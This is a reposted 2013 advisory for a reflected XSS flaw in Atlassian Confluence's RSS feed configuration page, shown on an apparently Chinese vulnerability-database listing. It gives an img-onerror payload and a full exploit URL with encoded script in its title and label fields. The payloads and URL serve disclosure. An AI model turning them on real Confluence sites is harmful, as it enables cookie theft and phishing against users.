Atlassian Confluence 5.3 Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044627 漏洞类型
发布时间 2013-08-07 更新时间 2013-08-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080066
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Atlassian Confluence, the Enterprise Wiki  Reflected XSS

Details
==============================================================================
Product: Atlassian Confluence 3.5.6 till 5.3(latest version), the Enterprise Wiki 
Security-Risk: Critical
Remote-Exploit: yes
Vendor-URL: http://www.atlassian.com
Advisory-Status: Not Published

Credits
==============================================================================
Discovered by: Muhammad Waqar 

Affected Products:
==============================================================================
Atlassian Confluence 3.5.6, the Enterprise Wiki till latest version Atlassian Confluence 5.3


Description
==============================================================================
It's a wiki. You can use it to collaborate on writing and sharing content with your team.

More Details
==============================================================================
I have discsovered a Reflected Cross site scripting (XSS) inside
Atlassian Confluence, the Enterprise Wiki , 
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
==============================================================================
Follow below steps to reproduce:

Navigate to this link http://www.example/dashboard/configurerssfeed.action

Now you see RSS feed creation options

Select any options you want You can see "Advanced Options" click on it and in the input fields put my XSS payload that is
"><img src=x onerror=alert(9);>

Now click on "Create RSS Feed", it will navigate to another page where you see your inserted javascript executed.


Exploit
==============================================================================
Created Feed can be use any where and does not need any sort of authentication so it can be easy for cookie stealing and other attacks.

http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&
types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=
&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed

Note: This exploit works in FireFox/Opera.

Solution
==============================================================================
Input provided by the user is not properly sanitized while posting it so it should be sanitized.


-- 
Regards,
Muhammad Waqar